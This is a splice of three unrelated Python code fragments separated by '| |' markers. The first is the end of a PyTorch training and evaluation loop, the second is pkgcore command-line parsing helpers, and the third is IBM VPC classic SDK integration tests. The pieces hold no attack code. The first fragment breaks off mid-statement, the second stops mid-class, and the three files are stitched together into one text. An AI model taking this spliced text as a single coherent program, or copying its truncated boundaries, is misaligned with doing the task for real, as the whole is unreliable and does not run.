_, dist_s = p_dist_s.max(1)
# score, label = logit.max(1)
for sid,diss,dise,ln,ln_,br,l_s,l_e, l in zip(sent_id, dist_s.cpu().detach().numpy(), \
dist_e.cpu().detach().numpy(), \
p_land.cpu().detach().numpy(), \
p_cland.cpu().detach().numpy(), \
bear_label.cpu().detach().numpy(), \
p_start.cpu().detach().numpy(), \
p_end.cpu().detach().numpy(), \
label.cpu().detach().numpy()):
br = dset.label2bearing[br]
# print(ans)
sentid2ans[sid.item()] = (l, diss,dise, ln,ln_, br,l_s,l_e)
n_iter += 1
# writer.add_scalar('Loss/test', np.random.random(), n_iter)
# self.scheduler.step(loss)
log_str = f"\nEpoch {epoch}: Total Loss {total_loss}\n"
tmp_acc, mDist, acc2, acc3, tmpAcc = evaluator.evaluate(sentid2ans)
log_str += f"\nEpoch {epoch}: Train {tmpAcc * 100.}%\n"
# log_str += f"\nEpoch {epoch}: Training Av. Distance {mDist}m\n"
self.writer.add_scalar('Accuracy/train [IoU=0.5]', tmpAcc * 100., n_iter)
# awlf.writer.close()
if self.valid_tuple is not None: # Do Validation
valid_score, m_dist, acc2, acc3, tAcc = self.evaluate(eval_tuple)
if valid_score > best_valid:
best_valid = valid_score
# self.save(f"BEST_{args.abla}")
if tmpAcc > best_train:
best_train = tmpAcc
if acc2 > best_acc2:
best_acc2 = acc2
if acc3 > best_acc3:
best_acc3 = acc3
self.save(f"BEST_{args.abla}")
if tAcc > best_tacc:
best_tacc = tAcc
if m_dist[0] < best_mDist[0]:
best_mDist = m_dist
self.writer.add_scalar('Accuracy/valid [IoU=0.5]', valid_score * 100., n_iter)
# awlf.writer.close()
log_str += f"Epoch {epoch}: Best Valid dist/pixel [SD] {best_mDist[0]} [{best_mDist[1]}] / {best_mDist[2]} [{best_mDist[1]}] \n" + \
f"Epoch {epoch}: Best Train {best_train * 100.}%\n" + \
f"Epoch {epoch}: Best Val3 {best_acc3 * 100.}%\n" + \
f"Epoch {epoch}: T-Best Val {best_tacc * 100.}%\n"
if self.test_tuple is not None: # Do Validation
_, test_dist, _, _, test_acc = self.evaluate(self.test_tuple)
print("test")
if test_acc > best_test_acc:
best_test_acc = test_acc
if test_dist[0] < best_testDist[0]:
best_testDist = test_dist
log_str += f"Epoch {epoch}: Test {test_acc * 100.}%\n" + \
f"Epoch {epoch}: Best Test dist/pixel [SD] {best_testDist[0]} [{best_testDist[1]}] / {best_testDist[2]} [{best_testDist[1]}]\n" + \
f"Epoch {epoch}: Best Test {best_test_acc * 100.}%\n"
print(log_str, end='')
with open(self.output + "/log.log", 'a') as f:
f.write(log_str)
f.flush()
self.save(f"LAST_{args.abla}")
return best_acc3, best_mDist, best_testDist
def predict(self, eval_tuple: DataTuple, dump=None):
"""
Predict the answers to questions in a data split.
:param eval_tuple: The data tuple to be evaluated.
:param dump: The path of saved file to dump results.
:return: A dict of question_id to answer.
"""
self.model.eval()
dset, loader, evaluator = eval_tuple
sentid2ans = {}
for i, datum_tuple in enumerate(loader):
ques_id, feats, feat_mask, boxes, names, sent, g_ds, g_de, land_,cland_, bear_ = datum_tuple[:11] # Avoid seeing ground truth
with torch.no_grad():
if args.n_ent:
names = (names[0].squeeze(2).cuda(), \
names[1].squeeze(2).cuda(), \
names[2].squeeze(2).cuda())
elif args.qa:
names = (names[0].cuda(), \
names[1].cuda(), \
names[2].cuda())
else:
names = None
feats, feat_mask, boxes = feats.cuda(),feat_mask.cuda(), boxes.cuda()
label, aux = self.model(feats.float(), feat_mask.float(), boxes.float(), names, sent)
dist_s, dist_e, lnd,clnd, brng, land_start, land_end = aux
bear_score, bear_label = brng.max(1)
_, dist_e = dist_e.max(1)
_, dist_s = dist_s.max(1)
_, land_start = land_start.max(1)
_, land_end = land_end.max(1)
_, clnd = clnd.max(1)
for qid,diss,dise, ln,cln, br,l_s,l_e, l in zip(ques_id,dist_s.cpu().detach().numpy(), \
dist_e.cpu().detach().numpy(), \
lnd.cpu().detach().numpy(), \
clnd.cpu().detach().numpy(), \
bear_label.cpu().detach().numpy(), \
land_start.cpu().detach().numpy(), \
land_end.cpu().detach().numpy(), \
label.cpu().detach().numpy()):
# ans = dset.label2ans[l]
# input(br)
br = dset.label2bearing[br]
sentid2ans[qid.item()] = (l, diss, dise, ln,cln, br, l_s, l_e)
return sentid2ans
def evaluate(self, eval_tuple: DataTuple, dump=None):
"""Evaluate all data in data_tuple."""
sentid2ans = self.predict(eval_tuple, dump)
return eval_tuple.evaluator.evaluate(sentid2ans)
@staticmethod
def oracle_score(data_tuple):
dset, loader, evaluator = data_tuple
sentid2ans = {}
for i, (ques_id, feats, feat_mask, boxes, names, sent,dists,diste,land_,cland_, bear_,land_s,land_e, target) in enumerate(loader):
# input(target)
label = target
for qid,diss,dise, ln,cln, br,l_s,l_e, l in | |
<reponame>thesamesam/pkgcore
"""Utilities for writing commandline utilities.
pkgcore scripts should use the :obj:`ArgumentParser` subclass here for a
consistent commandline "look and feel" (and it tries to make life a
bit easier too). They will probably want to use :obj:`main` from an C{if
__name__ == '__main__'} block too: it will take care of things like
consistent exception handling.
See dev-notes/commandline.rst for more complete documentation.
"""
import argparse
import os
import sys
from functools import partial
from importlib import import_module
from snakeoil import modules
from snakeoil.cli import arghparse, tool
from snakeoil.log import suppress_logging
from snakeoil.osutils import abspath, normpath, pjoin
from snakeoil.sequences import iflatten_instance, unstable_unique
from snakeoil.strings import pluralism
from .. import const
from ..config import load_config
from ..plugin import get_plugins
from ..repository import errors as repo_errors
from ..restrictions import packages, restriction
from . import parserestrict
class StoreTarget(argparse._AppendAction):
"""Parse extended package atom syntax and optionally set arguments.
Various target arguments are supported including the following:
atom
An extended atom syntax is supported, see the related section
in pkgcore(5).
package set
Used to define lists of packages, the syntax used for these is
@pkgset. For example, the @system and @world package sets are
supported.
extended globbing
Globbing package names or atoms allows for use cases such as
``'far*'`` (merge every package starting with 'far'),
``'dev-python/*::gentoo'`` (merge every package in the dev-python
category from the gentoo repo), or even '*' (merge everything).
Also, the target '-' allows targets to be read from standard input.
"""
def __init__(self, *args, **kwargs):
self.use_sets = kwargs.pop('use_sets', False)
self.allow_ebuild_paths = kwargs.pop('allow_ebuild_paths', False)
self.allow_external_repos = kwargs.pop('allow_external_repos', False)
self.separator = kwargs.pop('separator', None)
kwargs.setdefault('default', ())
super().__init__(*args, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if self.separator is not None:
values = values.split(self.separator)
if self.use_sets:
setattr(namespace, self.use_sets, [])
if isinstance(values, str):
values = [values]
elif values is not None and len(values) == 1 and values[0] == '-':
if not sys.stdin.isatty():
values = [x.strip() for x in sys.stdin.readlines() if x.strip() != '']
# reassign stdin to allow interactivity (currently only works for unix)
sys.stdin = open('/dev/tty')
else:
raise argparse.ArgumentError(self, "'-' is only valid when piping data in")
# override default empty tuple value to appendable list
if values:
setattr(namespace, self.dest, [])
for token in values:
if self.use_sets and token.startswith('@'):
namespace.sets.append(token[1:])
else:
if self.allow_ebuild_paths and token.endswith('.ebuild'):
try:
repo = getattr(namespace, 'repo', namespace.domain.ebuild_repos_raw)
except AttributeError:
raise argparse.ArgumentTypeError(
'repo or domain must be defined in the namespace')
if not os.path.exists(token):
raise argparse.ArgumentError(self, f"nonexistent ebuild: {token!r}")
elif not os.path.isfile(token):
raise argparse.ArgumentError(self, f"invalid ebuild: {token!r}")
if self.allow_external_repos and token not in repo:
repo_root_dir = os.path.abspath(
pjoin(token, os.pardir, os.pardir, os.pardir))
try:
with suppress_logging():
repo = namespace.domain.add_repo(
repo_root_dir, config=namespace.config)
except repo_errors.RepoError as e:
raise argparse.ArgumentError(self, f"{token!r} -- {e}")
try:
restriction = repo.path_restrict(token)
except ValueError as e:
raise argparse.ArgumentError(self, e)
else:
try:
restriction = parserestrict.parse_match(token)
except parserestrict.ParseError as e:
parser.error(e)
super().__call__(
parser, namespace,
(token, restriction), option_string=option_string)
CONFIG_ALL_DEFAULT = object()
class NoDefaultConfigError(argparse.ArgumentError):
pass
class StoreConfigObject(argparse._StoreAction):
default_priority = 20
def __init__(self, *args, **kwargs):
self.priority = int(kwargs.pop("priority", self.default_priority))
self.config_type = kwargs.pop("config_type", None)
if self.config_type is None or not isinstance(self.config_type, str):
raise ValueError("config_type must specified, and be a string")
if kwargs.pop("get_default", False):
kwargs["default"] = arghparse.DelayedValue(
partial(self.store_default, self.config_type,
option_string=kwargs.get('option_strings', [None])[0]),
self.priority)
self.store_name = kwargs.pop("store_name", False)
self.writable = kwargs.pop("writable", None)
self.target = argparse._StoreAction(*args, **kwargs)
super().__init__(*args, **kwargs)
@staticmethod
def _choices(sections):
"""Yield available values for a given option."""
for k, v in sections.items():
yield k
def _load_obj(self, sections, name):
obj_type = self.metavar if self.metavar is not None else self.config_type
obj_type = obj_type.lower() + ' ' if obj_type is not None else ''
try:
val = sections[name]
except KeyError:
choices = ', '.join(self._choices(sections))
if choices:
choices = f" (available: {choices})"
raise argparse.ArgumentError(
self, f"couldn't find {obj_type}{name!r}{choices}")
if self.writable and getattr(val, 'frozen', False):
raise argparse.ArgumentError(
self, f"{obj_type}{name!r} is readonly")
if self.store_name:
return name, val
return val
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, arghparse.DelayedParse(
partial(self._real_call, parser, namespace, values, option_string),
self.priority))
def _get_sections(self, config, namespace):
return getattr(config, self.config_type)
def _real_call(self, parser, namespace, values, option_string=None):
config = getattr(namespace, 'config', None)
if config is None:
raise ValueError("no config found, internal bug")
sections = self._get_sections(config, namespace)
if self.nargs == argparse.ZERO_OR_MORE and values == []:
values = list(sections.keys())
if values is CONFIG_ALL_DEFAULT:
value = [self._load_obj(sections, x) for x in sections]
elif isinstance(values, str):
value = self._load_obj(sections, values)
else:
value = [self._load_obj(sections, x) for x in values]
setattr(namespace, self.dest, value)
@staticmethod
def store_default(config_type, namespace, attr, option_string=None):
config = getattr(namespace, 'config', None)
if config is None:
raise argparse.ArgumentTypeError(
"no config found -- internal bug, or broken on disk configuration")
obj = config.get_default(config_type)
if obj is None:
known_objs = sorted(getattr(config, config_type).keys())
msg = f"config error: no default object of type {config_type!r} found. "
if not option_string:
msg += "Please fix your configuration."
else:
msg += (
"Please either fix your configuration, or set the "
f"{config_type} via the {option_string} option.")
if known_objs:
msg += f"Known {config_type}s: {', '.join(map(repr, known_objs))}"
raise NoDefaultConfigError(None, msg)
setattr(namespace, attr, obj)
@staticmethod
def store_all_default(config_type, namespace, attr):
config = getattr(namespace, 'config', None)
if config is None:
raise ValueError("no config found -- internal bug")
obj = [(k, v) for k, v in getattr(config, config_type).items()]
setattr(namespace, attr, obj)
@classmethod
def lazy_load_object(cls, config_type, key, priority=None):
if priority is None:
priority = cls.default_priority
return arghparse.DelayedValue(
partial(cls._lazy_load_object, config_type, key),
priority)
@staticmethod
def _lazy_load_object(config_type, key, namespace, attr):
try:
obj = getattr(namespace.config, config_type)[key]
except KeyError:
raise argparse.ArgumentError(
None, f"couldn't find {config_type} {attr!r}")
setattr(namespace, attr, obj)
class StoreRepoObject(StoreConfigObject):
"""Load a repo object from the config."""
# mapping between supported repo type requests and the related attr on
# domain objects to pull the requested repos from
valid_repo_types = {
'config': 'repo_configs',
'all': 'repos',
'all-raw': 'repos_raw',
'source': 'source_repos',
'source-raw': 'source_repos_raw',
'installed': 'installed_repos',
'installed-raw': 'installed_repos_raw',
'unfiltered': 'unfiltered_repos',
'ebuild': 'ebuild_repos',
'ebuild-unfiltered': 'ebuild_repos_unfiltered',
'ebuild-raw': 'ebuild_repos_raw',
'binary': 'binary_repos',
'binary-unfiltered': 'binary_repos_unfiltered',
'binary-raw': 'binary_repos_raw',
}
def __init__(self, *args, **kwargs):
if 'config_type' in kwargs:
raise ValueError(
"StoreRepoObject: config_type keyword is redundant: got %s"
% (kwargs['config_type'],))
self.repo_type = kwargs.pop('repo_type', 'all')
if self.repo_type not in self.valid_repo_types:
raise argparse.ArgumentTypeError(f"unknown repo type: {self.repo_type!r}")
self.repo_key = self.valid_repo_types[self.repo_type]
self.allow_aliases = set(kwargs.pop("allow_aliases", ()))
if self.allow_aliases:
unknown_aliases = self.allow_aliases.difference(self.valid_repo_types)
if unknown_aliases:
raise argparse.ArgumentTypeError(
'unknown repo alias%s: %s' % (
pluralism(unknown_aliases, plural='es'), ', '.join(unknown_aliases)))
if self.repo_type == 'config':
kwargs['config_type'] = 'repo_config'
else:
kwargs['config_type'] = 'repo'
self.allow_name_lookup = kwargs.pop("allow_name_lookup", True)
self.allow_external_repos = kwargs.pop("allow_external_repos", False)
super().__init__(*args, **kwargs)
def _get_sections(self, config, namespace):
domain = getattr(namespace, 'domain', None)
# return repo config objects
if domain is None or self.repo_type == 'config':
return StoreConfigObject._get_sections(self, config, namespace)
self.config = config
self.domain = config.get_default("domain")
# return the type of repos requested
return getattr(self.domain, self.repo_key)
@staticmethod
def _choices(sections):
"""Return an iterable of name: location mappings for available repos.
If a repo doesn't have a proper location just the name is returned.
"""
for repo_name, repo in sorted(unstable_unique(sections.items())):
repo_name = getattr(repo, 'repo_id', repo_name)
if hasattr(repo, 'location'):
yield f"{repo_name}:{repo.location}"
else:
yield repo_name
def _load_obj(self, sections, name):
repo = name
if not self.allow_name_lookup or repo in sections:
# requested repo exists in the config
pass
elif name in self.allow_aliases and self.valid_repo_types[name]:
# pull repos related to given alias
return getattr(self.domain, self.valid_repo_types[name])
else:
# name wasn't found, check repo aliases for it
for repo_name, repo_obj in sections.items():
if repo in repo_obj.aliases:
repo = repo_name
break
else:
# try to add it as an external repo
if self.allow_external_repos and os.path.exists(repo):
try:
configure = not self.repo_type.endswith('-raw')
with suppress_logging():
repo_obj = self.domain.add_repo(
repo, config=self.config, configure=configure)
repo = repo_obj.location
except repo_errors.RepoError as e:
raise argparse.ArgumentError(self, e)
if hasattr(self.domain, '_' + self.repo_key):
# force JIT-ed attr refresh to include newly added repo
setattr(self.domain, '_' + self.repo_key, None)
sections = getattr(self.domain, self.repo_key)
return StoreConfigObject._load_obj(self, sections, repo)
class DomainFromPath(StoreConfigObject):
def __init__(self, *args, **kwargs):
kwargs['config_type'] = 'domain'
super().__init__(*args, **kwargs)
def _load_obj(self, sections, requested_path):
targets = list(find_domains_from_path(sections, requested_path))
if not targets:
raise ValueError(f"couldn't find domain at path {requested_path!r}")
elif len(targets) != 1:
raise ValueError(
"multiple domains claim root %r: domains %s" %
(requested_path, ', '.join(repr(x[0]) for x in targets)))
return targets[0][1]
def find_domains_from_path(sections, path):
path = normpath(abspath(path))
for name, domain in sections.items():
root = getattr(domain, 'root', None)
if root is None:
continue
root = normpath(abspath(root))
if root == path:
yield name, domain
class BooleanQuery(arghparse.DelayedValue):
def __init__(self, attrs, klass_type=None, | |
<filename>test/integration/test_gen1.py
# coding: utf-8
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_cloud_sdk_core.api_exception import ApiException
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import json
import pytest
import namegenerator
from ibm_vpc.vpc_classic_v1 import *
store = {}
class TestGeography():
def test_regions(self, createGen1Service, env):
regions = list_regions(createGen1Service)
assert regions.status_code == 200
region = regions.get_result()['regions'][0]
store['region'] = region['name']
if not env:
store['zone'] = region['zones'][0]['name']
def test_region(self, createGen1Service):
region = get_region(createGen1Service, store['region'])
assert region.status_code == 200
def test_zones(self, createGen1Service, env):
zones = list_zones(createGen1Service, store['region'])
assert zones.status_code == 200
if env:
store['zone'] = zones.get_result()['zones'][0]['name']
print('store[zone]', store['zone'])
def test_zone(self, createGen1Service):
zone = get_zone(createGen1Service, store['region'], store['zone'])
assert zone.status_code == 200
class TestFloatingIPs():
def test_create_floating_ip(self, createGen1Service):
fip = create_floating_ip(createGen1Service)
assertCreateResponse(fip)
store['created_fip_id'] = fip.get_result()['id']
def test_list_floating_ip(self, createGen1Service):
fips = list_floating_ips(createGen1Service)
assertListResponse(fips, 'floating_ips')
def test_get_floating_ip(self, createGen1Service):
fip = get_floating_ip(createGen1Service, store['created_fip_id'])
assertGetPatchResponse(fip)
def test_update_floating_ip(self, createGen1Service):
fip = update_floating_ip(createGen1Service, store['created_fip_id'])
assertGetPatchResponse(fip)
class TestImages():
def test_create_images(self, createGen1Service):
pytest.skip("no cos bucket")
image = create_image(createGen1Service)
assertCreateResponse(image)
def test_list_images(self, createGen1Service):
images = list_images(createGen1Service)
assertListResponse(images, 'images')
store['image_id'] = images.get_result()['images'][0]['id']
def test_get_image(self, createGen1Service):
image = get_image(createGen1Service, store['image_id'])
assertGetPatchResponse(image)
def test_update_image(self, createGen1Service):
pytest.skip("no private image")
image = update_image(createGen1Service, store['created_image'])
assertGetPatchResponse(image)
def test_delete_image(self, createGen1Service):
pytest.skip("no private image")
image = delete_image(createGen1Service, store['created_image'])
assertDeleteResponse(image)
def test_list_operating_systems(self, createGen1Service):
oss = list_operating_systems(createGen1Service, )
assertListResponse(oss, 'operating_systems')
store['operating_system_name'] = oss.get_result()['operating_systems'][0]['name']
def test_get_operating_system(self, createGen1Service):
os = get_operating_system(createGen1Service, store['operating_system_name']).get_result()
assert os['name'] == store['operating_system_name']
class TestSSHKeys():
def test_create_ssh_keys(self, createGen1Service):
key = create_key(createGen1Service)
assertCreateResponse(key)
store['created_key'] = key.get_result()['id']
def test_list_ssh_keys(self, createGen1Service):
keys = list_keys(createGen1Service)
assertListResponse(keys, 'keys')
def test_get_ssh_key(self, createGen1Service):
key = get_key(createGen1Service, store['created_key'])
assertGetPatchResponse(key)
def test_update_key(self, createGen1Service):
key = update_key(createGen1Service, store['created_key'])
assertGetPatchResponse(key)
class TestNetworkACL():
def test_list_nacl(self, createGen1Service):
acls = list_network_acls(createGen1Service)
assertListResponse(acls, 'network_acls')
store['nacl_id'] = acls.get_result()['network_acls'][0]['id']
def test_get_nacl(self, createGen1Service):
acl = get_network_acl(createGen1Service, store['nacl_id'])
assertGetPatchResponse(acl)
def test_create_nacl(self, createGen1Service):
acl = create_network_acl(createGen1Service, store['nacl_id'])
assertCreateResponse(acl)
store['created_nacl_id'] = acl.get_result()['id']
def test_list_nacl_rules(self, createGen1Service):
acl_rules = list_network_acl_rules(createGen1Service, store['created_nacl_id'])
assertListResponse(acl_rules, 'rules')
def test_create_nacl_rules(self, createGen1Service):
acl_rule = create_network_acl_rule(createGen1Service, store['created_nacl_id'])
assertCreateResponse(acl_rule)
store['created_nacl_rule_id'] = acl_rule.get_result()['id']
def test_get_nacl_rules(self, createGen1Service):
acl_rules = get_network_acl_rule(createGen1Service, store['created_nacl_id'], store['created_nacl_rule_id'])
assertGetPatchResponse(acl_rules)
def test_update_nacl_rules(self, createGen1Service):
acl_rule = update_network_acl_rule(createGen1Service, store['created_nacl_id'], store['created_nacl_rule_id'])
assertGetPatchResponse(acl_rule)
def test_delete_nacl_rules(self, createGen1Service):
acl_rule = delete_network_acl_rule(createGen1Service, store['created_nacl_id'], store['created_nacl_rule_id'])
assertDeleteResponse(acl_rule)
def test_update_nacl(self, createGen1Service):
acl = update_network_acl(createGen1Service, store['created_nacl_id'])
assertGetPatchResponse(acl)
class TestVolume():
def test_list_vol_profiles(self, createGen1Service):
profiles = list_volume_profiles(createGen1Service)
assertListResponse(profiles, 'profiles')
store['vol_profile'] = profiles.get_result()['profiles'][0]['name']
def test_get_vol_profile(self, createGen1Service):
vol = get_volume_profile(createGen1Service, store['vol_profile'])
response = vol.get_result()
assert vol.status_code == 200
assert response['name'] is not None
def test_create_volume(self, createGen1Service):
vol = create_volume(createGen1Service, store['zone'])
assertCreateResponse(vol)
store['created_vol'] = vol.get_result()['id']
def test_list_vols(self, createGen1Service):
vols = list_volumes(createGen1Service)
assertListResponse(vols, 'volumes')
def test_get_vol(self, createGen1Service):
vol = get_volume(createGen1Service, store['created_vol'])
assertGetPatchResponse(vol)
def test_update_vol(self, createGen1Service):
vol = update_volume(createGen1Service, store['created_vol'])
assertGetPatchResponse(vol)
class TestVPC():
def test_list_vpc(self, createGen1Service):
vpcs = list_vpcs(createGen1Service)
assertListResponse(vpcs, 'vpcs')
def test_create_vpc(self, createGen1Service):
vpc = create_vpc(createGen1Service)
assertCreateResponse(vpc)
store['created_vpc'] = vpc.get_result()['id']
print('created_vpc: ' + store['created_vpc'])
def test_get_vpc(self, createGen1Service):
vpc = get_vpc(createGen1Service, store['created_vpc'])
assertGetPatchResponse(vpc)
def test_update_vpc(self, createGen1Service):
vpc = update_vpc(createGen1Service, store['created_vpc'])
assertGetPatchResponse(vpc)
class TestSubnet():
def test_list_subnet(self, createGen1Service):
subnets = list_subnets(createGen1Service)
assertListResponse(subnets, 'subnets')
subnet = subnets.get_result()['subnets'][0]
# store['subnet_id'] = subnet['id']
store['vpc_id'] = subnet['vpc']['id']
store['zone'] = subnet['zone']['name']
def test_create_subnet(self, createGen1Service):
print(store['zone'], store['created_vpc'])
subnet = create_subnet(createGen1Service, store['created_vpc'], store['zone'])
assertCreateResponse(subnet)
store['created_subnet'] = subnet.get_result()['id']
print('created_subnet: ' + store['created_subnet'])
def test_get_subnet(self, createGen1Service):
subnet = get_subnet(createGen1Service, store['created_subnet'])
assertGetPatchResponse(subnet)
def test_update_subnet(self, createGen1Service):
subnet = update_subnet(createGen1Service, store['created_subnet'])
assertGetPatchResponse(subnet)
def test_update_subnet_nacl(self, createGen1Service):
subnet_nacl = replace_subnet_network_acl(createGen1Service, store['created_subnet'], store['created_nacl_id'])
assertCreateResponse(subnet_nacl)
def test_get_subnet_nacl(self, createGen1Service):
subnet_nacl = get_subnet_network_acl(createGen1Service, store['created_subnet'])
assertGetPatchResponse(subnet_nacl)
class TestPublicGateways():
def test_create_pgw(self, createGen1Service):
print(store['zone'])
pgw = create_public_gateway(createGen1Service, store['created_vpc'], store['zone'])
assertCreateResponse(pgw)
store['created_pgw'] = pgw.get_result()['id']
def test_list_pgws(self, createGen1Service):
pgws = list_public_gateways(createGen1Service)
assertListResponse(pgws, 'public_gateways')
def test_get_pgw(self, createGen1Service):
pgw = get_public_gateway(createGen1Service, store['created_pgw'])
assertGetPatchResponse(pgw)
def test_update_pgw(self, createGen1Service):
pgw = update_public_gateway(createGen1Service, store['created_pgw'])
assertGetPatchResponse(pgw)
def test_update_subnet_pgw(self, createGen1Service):
subnet = set_subnet_public_gateway(createGen1Service, store['created_subnet'], store['created_pgw'])
assertCreateResponse(subnet)
def test_get_subnet_pgw(self, createGen1Service):
subnet = get_subnet_public_gateway(createGen1Service, store['created_subnet'])
assertGetPatchResponse(subnet)
def test_delete_subnet_pgw(self, createGen1Service):
vpc = unset_subnet_public_gateway(createGen1Service, store['created_subnet'])
assertDeleteResponse(vpc)
class TestInstances():
def test_list_instances(self, createGen1Service):
instances = list_instances(createGen1Service)
assertListResponse(instances, 'instances')
instance = instances.get_result()['instances'][0]
store['instance_id'] = instance['id']
store['network_interface_id'] = instance['primary_network_interface']['id']
def test_list_instance_profiles(self, createGen1Service):
profiles = list_instance_profiles(createGen1Service)
assertListResponse(profiles, 'profiles')
store['instance_profile'] = profiles.get_result()['profiles'][0]['name']
def test_get_instance_profile(self, createGen1Service):
prof = get_instance_profile(createGen1Service, store['instance_profile'])
assert prof.status_code == 200
assert prof.get_result() is not None
def test_create_instance(self, createGen1Service):
ins = create_instance(createGen1Service, store['created_vpc'], store['instance_profile'], store['zone'],
store['image_id'], store['created_subnet'])
assertCreateResponse(ins)
store['created_instance_id'] = ins.get_result()['id']
print('created_instance_id -' + store['created_instance_id'])
def test_get_instance(self, createGen1Service):
instance = get_instance(createGen1Service, store['created_instance_id'])
assertGetPatchResponse(instance)
def test_update_instance(self, createGen1Service):
instance = update_instance(createGen1Service, store['created_instance_id'])
assertGetPatchResponse(instance)
def test_create_instance_action(self, createGen1Service):
instance = create_instance_action(createGen1Service, store['created_instance_id'])
assert instance.status_code == 201
assert instance.get_result()['id'] is not None
def test_get_instance_initialization(self, createGen1Service):
instance = get_instance_initialization(createGen1Service, store['created_instance_id'])
assert instance.status_code == 200
assert instance.get_result() is not None
def test_list_instance_network_interfaces(self, createGen1Service):
instance_nics = list_instance_network_interfaces(createGen1Service, store['created_instance_id'])
assertListResponse(instance_nics, 'network_interfaces')
store['nic_id'] = instance_nics.get_result()['network_interfaces'][0]['id']
def test_get_instance_network_interface(self, createGen1Service):
instance_nic = get_instance_network_interface(createGen1Service, store['created_instance_id'], store['nic_id'])
assertGetPatchResponse(instance_nic)
def test_create_instance_nic_fip(self, createGen1Service):
fip = add_instance_network_interface_floating_ip(createGen1Service, store['created_instance_id'],
store['nic_id'], store['created_fip_id'])
assertCreateResponse(fip)
store['created_nic_fip'] = fip.get_result()['id']
def test_get_instance_nic_fips(self, createGen1Service):
fips = list_instance_network_interface_floating_ips(createGen1Service,
store['created_instance_id'], store['nic_id'])
assertListResponse(fips, 'floating_ips')
def test_get_instance_nic_fip(self, createGen1Service):
fips = get_instance_network_interface_floating_ip(createGen1Service, store['created_instance_id'], store['nic_id'], store['created_fip_id'])
assertGetPatchResponse(fips)
def test_delete_instance_nic_fip(self, createGen1Service):
fips = remove_instance_network_interface_floating_ip(createGen1Service, store['created_instance_id'], store['nic_id'], store['created_fip_id'] )
assertDeleteResponse(fips)
def test_create_instance_vol_attachment(self, createGen1Service):
vol_attach = create_instance_volume_attachment(createGen1Service, store['created_instance_id'], store['created_vol'])
assertCreateResponse(vol_attach)
store['created_vol_atchmt'] = vol_attach.get_result()['id']
def test_list_instance_vol_attachment(self, createGen1Service):
instance_vol_attachments = list_instance_volume_attachments(createGen1Service, store['created_instance_id'])
assertListResponse(instance_vol_attachments, 'volume_attachments')
def test_get_instance_vol_attachment(self, createGen1Service):
vol_attach = get_instance_volume_attachment(createGen1Service, store['created_instance_id'], store['created_vol_atchmt'])
assertGetPatchResponse(vol_attach)
def test_update_instance_vol_attachment(self, createGen1Service):
vol_attach = update_instance_volume_attachment(createGen1Service, store['created_instance_id'], store['created_vol_atchmt'])
assertGetPatchResponse(vol_attach)
def test_delete_instance_vol_attachment(self, createGen1Service):
vol_attach = delete_instance_volume_attachment(createGen1Service, store['created_instance_id'], store['created_vol_atchmt'])
assertDeleteResponse(vol_attach)
def test_delete_instance(self, createGen1Service):
ins = delete_instance(createGen1Service, store['created_instance_id'])
assertDeleteResponse(ins)
class TestSecurityGroups():
def test_create_sg(self, createGen1Service):
sg = create_security_group(createGen1Service, store['created_vpc'])
assertCreateResponse(sg)
store['created_sg_id'] = sg.get_result()['id']
def test_list_sgs(self, createGen1Service):
sgs = list_security_groups(createGen1Service)
assertListResponse(sgs, 'security_groups')
def test_get_sg(self, createGen1Service):
sg = get_security_group(createGen1Service, store['created_sg_id'])
assertGetPatchResponse(sg)
def test_update_sg_network_interface(self, createGen1Service):
sg_network_interface = add_security_group_network_interface(createGen1Service, store['created_sg_id'], store['network_interface_id'])
assertCreateResponse(sg_network_interface)
store['created_sg_network_interface_id'] = sg_network_interface.get_result()['id']
def test_list_sg_network_interface(self, createGen1Service):
sg_network_interface = list_security_group_network_interfaces(createGen1Service, store['created_sg_id'])
assert sg_network_interface.status_code == 200
def test_get_sg_network_interface(self, createGen1Service):
sg_network_interface = get_security_group_network_interface(createGen1Service, store['created_sg_id'], store['created_sg_network_interface_id'])
assertGetPatchResponse(sg_network_interface)
def test_delete_sg_network_interface(self, createGen1Service):
sg_network_interface = remove_security_group_network_interface(createGen1Service, store['created_sg_id'], store['created_sg_network_interface_id'])
assertDeleteResponse(sg_network_interface)
def test_create_sg_rule(self, createGen1Service):
sg_rule = create_security_group_rule(createGen1Service, store['created_sg_id'])
assertCreateResponse(sg_rule)
store['created_sg_rule_id'] = sg_rule.get_result()['id']
def test_list_sg_rules(self, createGen1Service):
sg_rules = list_security_group_rules(createGen1Service, store['created_sg_id'])
assertListResponse(sg_rules, 'rules')
def test_get_sg_rule(self, createGen1Service):
sg_rule = get_security_group_rule(createGen1Service, store['created_sg_id'], store['created_sg_rule_id'])
assertGetPatchResponse(sg_rule)
def test_update_sg_rule(self, createGen1Service):
sg_rule = update_security_group_rule(createGen1Service, store['created_sg_id'], store['created_sg_rule_id'])
assertGetPatchResponse(sg_rule)
def test_delete_sg_rule(self, createGen1Service):
sg_rule = delete_security_group_rule(createGen1Service, store['created_sg_id'], store['created_sg_rule_id'])
assertDeleteResponse(sg_rule)
def test_update_sg(self, createGen1Service):
sg = update_security_group(createGen1Service, store['created_sg_id'])
assertGetPatchResponse(sg)
def test_delete_sg(self, createGen1Service):
sg = delete_security_group(createGen1Service, store['created_sg_id'])
assertDeleteResponse(sg)
class TestVPCDefaultSecurityGroup():
def test_get_sg_network_interface(self, createGen1Service):
vpc_default_sg= get_vpc_default_security_group(createGen1Service, store['created_vpc'])
assertGetPatchResponse(vpc_default_sg)
class TestVPCRoutes():
def test_create_route(self, createGen1Service):
pytest.skip("No env")
route = create_vpc_route(createGen1Service, store['created_vpc'], store['zone'])
assertCreateResponse(route)
store['created_route'] = route.get_result()['id']
def test_list_routes(self, createGen1Service):
routes = list_vpc_routes(createGen1Service, store['created_vpc'])
assertListResponse(routes, 'routes')
def test_get_route(self, createGen1Service):
pytest.skip("No env")
route = get_vpc_route(createGen1Service, store['created_vpc'], store['created_route'])
assertGetPatchResponse(route)
def test_update_route(self, createGen1Service):
pytest.skip("No env")
